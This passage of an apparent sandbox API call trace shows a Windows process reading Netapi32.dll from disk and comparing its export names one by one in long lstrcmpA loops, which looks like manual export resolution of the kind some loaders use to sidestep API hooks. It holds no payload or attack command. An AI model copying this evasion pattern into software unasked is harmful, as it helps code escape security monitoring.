lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0122.672] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.672] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0122.673] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.673] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0122.674] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0122.675] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0122.675] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.675] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.675] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0122.675] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0122.675] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0122.676] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0122.676] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0122.677] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0122.928] GetProcessHeap () returned 0x480000 [0122.928] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x39ed010 | out: hHeap=0x480000) returned 1 [0122.928] GetProcessHeap () returned 0x480000 [0122.928] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4991e0 [0122.929] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0122.932] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0122.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0122.933] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0122.933] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0122.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0122.934] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0122.934] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0122.934] GetProcessHeap () returned 0x480000 [0122.934] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13b00) returned 0x2cb5030 [0122.934] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0122.934] ReadFile (in: hFile=0x17c, lpBuffer=0x2cb5030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb5030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0122.935] CloseHandle (hObject=0x17c) returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0122.935] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0122.936] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0122.937] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", 